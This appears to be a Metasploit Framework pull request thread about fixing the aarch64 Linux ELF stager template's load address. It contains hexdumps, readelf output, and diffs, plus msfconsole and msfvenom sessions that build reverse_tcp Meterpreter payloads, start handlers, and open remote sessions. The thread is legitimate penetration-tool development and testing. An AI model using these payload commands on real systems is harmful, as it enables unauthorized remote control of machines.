set the org to be 0x400000

[ssst0n3]

try to fix #16562

[bcoles]

# hexdump data/templates/template_aarch64_linux.bin
0000000 457f 464c 0102 0001 0000 0000 0000 0000
0000010 0002 00b7 0000 0000 0078 0000 0000 0000
0000020 0040 0000 0000 0000 0000 0000 0000 0000
0000030 0000 0000 0040 0038 0001 0000 0000 0000
0000040 0001 0000 0007 0000 0000 0000 0000 0000
0000050 0000 0000 0000 0000 0000 0000 0000 0000
0000060 beef dead 0000 0000 beef dead 0000 0000
0000070 1000 0000 0000 0000                    
0000078

# hexdump template_aarch64_linux.bin
0000000 457f 464c 0102 0001 0000 0000 0000 0000
0000010 0002 00b7 0000 0000 0078 0040 0000 0000
0000020 0040 0000 0000 0000 0000 0000 0000 0000
0000030 0000 0000 0040 0038 0001 0000 0000 0000
0000040 0001 0000 0007 0000 0000 0000 0000 0000
0000050 0000 0040 0000 0000 0000 0040 0000 0000
0000060 beef dead 0000 0000 beef dead 0000 0000
0000070 1000 0000 0000 0000                    
0000078

Before

# readelf -a data/templates/template_aarch64_linux.bin
ELF Header:
  Magic:   7f 45 4c 46 02 01 01 00 00 00 00 00 00 00 00 00 
  Class:                             ELF64
  Data:                              2's complement, little endian
  Version:                           1 (current)
  OS/ABI:                            UNIX - System V
  ABI Version:                       0
  Type:                              EXEC (Executable file)
  Machine:                           AArch64
  Version:                           0x0
  Entry point address:               0x78
  Start of program headers:          64 (bytes into file)
  Start of section headers:          0 (bytes into file)
  Flags:                             0x0
  Size of this header:               64 (bytes)
  Size of program headers:           56 (bytes)
  Number of program headers:         1
  Size of section headers:           0 (bytes)
  Number of section headers:         0
  Section header string table index: 0

There are no sections in this file.

There are no section groups in this file.

Program Headers:
  Type           Offset             VirtAddr           PhysAddr
                 FileSiz            MemSiz              Flags  Align
  LOAD           0x0000000000000000 0x0000000000000000 0x0000000000000000
                 0x00000000deadbeef 0x00000000deadbeef  RWE    0x1000

There is no dynamic section in this file.

There are no relocations in this file.

The decoding of unwind sections for machine type AArch64 is not currently supported.

Dynamic symbol information is not available for displaying symbols.

No version information found in this file.

# objdump -x data/templates/template_aarch64_linux.bin 

data/templates/template_aarch64_linux.bin:     file format elf64-little
data/templates/template_aarch64_linux.bin
architecture: UNKNOWN!, flags 0x00000102:
EXEC_P, D_PAGED
start address 0x0000000000000078

Program Header:
    LOAD off    0x0000000000000000 vaddr 0x0000000000000000 paddr 0x0000000000000000 align 2**12
         filesz 0x00000000deadbeef memsz 0x00000000deadbeef flags rwx

Sections:
Idx Name          Size      VMA               LMA               File off  Algn
SYMBOL TABLE:
no symbols

After

# readelf -a template_aarch64_linux.bin
ELF Header:
  Magic:   7f 45 4c 46 02 01 01 00 00 00 00 00 00 00 00 00 
  Class:                             ELF64
  Data:                              2's complement, little endian
  Version:                           1 (current)
  OS/ABI:                            UNIX - System V
  ABI Version:                       0
  Type:                              EXEC (Executable file)
  Machine:                           AArch64
  Version:                           0x0
  Entry point address:               0x400078
  Start of program headers:          64 (bytes into file)
  Start of section headers:          0 (bytes into file)
  Flags:                             0x0
  Size of this header:               64 (bytes)
  Size of program headers:           56 (bytes)
  Number of program headers:         1
  Size of section headers:           0 (bytes)
  Number of section headers:         0
  Section header string table index: 0

There are no sections in this file.

There are no section groups in this file.

Program Headers:
  Type           Offset             VirtAddr           PhysAddr
                 FileSiz            MemSiz              Flags  Align
  LOAD           0x0000000000000000 0x0000000000400000 0x0000000000400000
                 0x00000000deadbeef 0x00000000deadbeef  RWE    0x1000

There is no dynamic section in this file.

There are no relocations in this file.

The decoding of unwind sections for machine type AArch64 is not currently supported.

Dynamic symbol information is not available for displaying symbols.

No version information found in this file.

# objdump -x template_aarch64_linux.bin 

template_aarch64_linux.bin:     file format elf64-little
template_aarch64_linux.bin
architecture: UNKNOWN!, flags 0x00000102:
EXEC_P, D_PAGED
start address 0x0000000000400078

Program Header:
    LOAD off    0x0000000000000000 vaddr 0x0000000000400000 paddr 0x0000000000400000 align 2**12
         filesz 0x00000000deadbeef memsz 0x00000000deadbeef flags rwx

Sections:
Idx Name          Size      VMA               LMA               File off  Algn
SYMBOL TABLE:
no symbols

[bwatters-r7]

msf6 payload(windows/meterpreter/reverse_http) > use payload/linux/aarch64/meterpreter/reverse_tcp
msf6 payload(linux/aarch64/meterpreter/reverse_tcp) > set lhost 10.5.135.101
lhost => 10.5.135.101
msf6 payload(linux/aarch64/meterpreter/reverse_tcp) > set lport 4567
lport => 4567
msf6 payload(linux/aarch64/meterpreter/reverse_tcp) > generate -f elf -o revtcp_aarch64_4567.elf
[*] Writing 332 bytes to revtcp_aarch64_4567.elf...
msf6 payload(linux/aarch64/meterpreter/reverse_tcp) > show options

Module options (payload/linux/aarch64/meterpreter/reverse_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST  10.5.135.101     yes       The listen address (an interface may be specified)
   LPORT  4567             yes       The listen port

msf6 payload(linux/aarch64/meterpreter/reverse_tcp) > to_handler
[*] Payload Handler Started as Job 0

[*] Started reverse TCP handler on 10.5.135.101:4567 
msf6 payload(linux/aarch64/meterpreter/reverse_tcp) > [*] Transmitting intermediate midstager...(256 bytes)
[*] Sending stage (924572 bytes) to 10.5.132.146
[*] Meterpreter session 1 opened (10.5.135.101:4567 -> 10.5.132.146:43134) at 2022-05-13 10:32:30 -0500

msf6 payload(linux/aarch64/meterpreter/reverse_tcp) > sessions -i -1
[*] Starting interaction with 1...

meterpreter > sysinfo
Computer     : 192.168.122.80
OS           : Ubuntu 18.04 (Linux 4.15.0-74-generic)
Architecture : aarch64
BuildTuple   : aarch64-linux-musl
Meterpreter  : aarch64/linux
meterpreter > getuid
Server username: msfuser
meterpreter > 

[bwatters-r7]

To highlight the changes, here is a diff the readelf -a data for a payload generated before and after the change:

tmoose@ubuntu:~/rapid7/metasploit-framework$ diff old.txt new.txt 
11c11
<   Entry point address:               0x78
---
>   Entry point address:               0x400078
29c29
<   LOAD           0x0000000000000000 0x0000000000000000 0x0000000000000000
---
>   LOAD           0x0000000000000000 0x0000000000400000 0x0000000000400000

And the binary template file

tmoose@ubuntu:~/rapid7/metasploit-framework$ diff xxd_output_aarch64_old.txt xxd_output_aarch64_new.txt 
2c2
< 00000010: 0200 b700 0000 0000 7800 0000 0000 0000  ........x.......
---
> 00000010: 0200 b700 0000 0000 7800 4000 0000 0000  ........x.@.....
6c6
< 00000050: 0000 0000 0000 0000 0000 0000 0000 0000  ................
---
> 00000050: 0000 4000 0000 0000 0000 4000 0000 0000  ..@.......@.....

[bwatters-r7]

Release Notes

This fixes a bug in the generation of aarch 64 stagers so that when the stage is received and written to memory, the stage can execute in a lower-privileged process.

[h00die-gr3y]

Hi @bwatters-r7 ,
I still seem to have the same or similar issue on my Raspberry Pi 4 Model B Rev 1.2 running an ARM64 architecture.
It might also be related to the armle bug #16107.

msf6 exploit(multi/handler) > version
Framework: 6.3.10-dev
Console  : 6.3.10-dev

# uname -a
Linux cerberus 5.15.44-Re4son-v8l+ #1 SMP PREEMPT Debian kali-pi (2022-07-03) aarch64 GNU/Linux

# lscpu
Architecture:            aarch64
  CPU op-mode(s):        32-bit, 64-bit
  Byte Order:            Little Endian
CPU(s):                  4
  On-line CPU(s) list:   0-3
Vendor ID:               ARM
  Model name:            Cortex-A72
    Model:               3
    Thread(s) per core:  1
    Core(s) per cluster: 4
    Socket(s):           -
    Cluster(s):          1
    Stepping:            r0p3
    CPU(s) scaling MHz:  67%
    CPU max MHz:         1500.0000
    CPU min MHz:         600.0000
    BogoMIPS:            108.00
    Flags:               fp asimd evtstrm crc32 cpuid
Caches (sum of all):
  L1d:                   128 KiB (4 instances)
  L1i:                   192 KiB (4 instances)
  L2:                    1 MiB (1 instance)
Vulnerabilities:
  Itlb multihit:         Not affected
  L1tf:                  Not affected
  Mds:                   Not affected
  Meltdown:              Not affected
  Spec store bypass:     Vulnerable
  Spectre v1:            Mitigation; __user pointer sanitization
  Spectre v2:            Vulnerable
  Srbds:                 Not affected
  Tsx async abort:       Not affected

Stageless payloads are working fine but staged payloads are failing with an illegal instruction error.

# msfvenom -p linux/aarch64/meterpreter/reverse_tcp LHOST=192.168.201.10 LPORT=4444 -f elf -o aarch64-staged
[-] No platform was selected, choosing Msf::Module::Platform::Linux from the payload
[-] No arch selected, selecting arch: aarch64 from the payload
No encoder specified, outputting raw payload
Payload size: 212 bytes
Final size of elf file: 332 bytes
Saved as: aarch64-staged
# file aarch64-staged
aarch64-staged: ELF 64-bit LSB executable, ARM aarch64, invalid version (SYSV), statically linked, no section header
# chmod +x aarch64-staged
# ./aarch64-staged
Illegal instruction

msf6 exploit(multi/handler) >
[*] Transmitting intermediate midstager...(256 bytes)
[*] Sending stage (949364 bytes) to 192.168.201.10
[-] Meterpreter session 12 is not valid and will be closed
[*]  - Meterpreter session 12 closed.

# msfvenom -p linux/aarch64/meterpreter_reverse_tcp LHOST=192.168.201.10 LPORT=4444 -f elf -o aarch64-stageless
[-] No platform was selected, choosing Msf::Module::Platform::Linux from the payload
[-] No arch selected, selecting arch: aarch64 from the payload
No encoder specified, outputting raw payload
Payload size: 1136368 bytes
Final size of elf file: 1136368 bytes
Saved as: aarch64-stageless
# file aarch64-stageless
aarch64-stageless: ELF 64-bit LSB pie executable, ARM aarch64, version 1 (SYSV), static-pie linked, with debug_info, not stripped
# chmod +x aarch64-stageless
# ./aarch64-stageless

msf6 exploit(multi/handler) >
[*] Meterpreter session 13 opened (192.168.201.10:4444 -> 192.168.201.10:42052) at 2023-05-16 20:43:14 +0000

Interesting observation is that the command file aarch64-staged produces an invalid version (SYSV) warning.

[h00die-gr3y]

readelf shows similar output, so I am beginning to think that it is more related to armle bug #16107.

# readelf -a ./aarch64-staged
ELF Header:
  Magic:   7f 45 4c 46 02 01 01 00 00 00 00 00 00 00 00 00
  Class:                             ELF64
  Data:                              2's complement, little endian
  Version:                           1 (current)
  OS/ABI:                            UNIX - System V
  ABI Version:                       0
  Type:                              EXEC (Executable file)
  Machine:                           AArch64
  Version:                           0x0
  Entry point address:               0x400078
  Start of program headers:          64 (bytes into file)
  Start of section headers:          0 (bytes into file)
  Flags:                             0x0
  Size of this header:               64 (bytes)
  Size of program headers:           56 (bytes)
  Number of program headers:         1
  Size of section headers:           0 (bytes)
  Number of section headers:         0
  Section header string table index: 0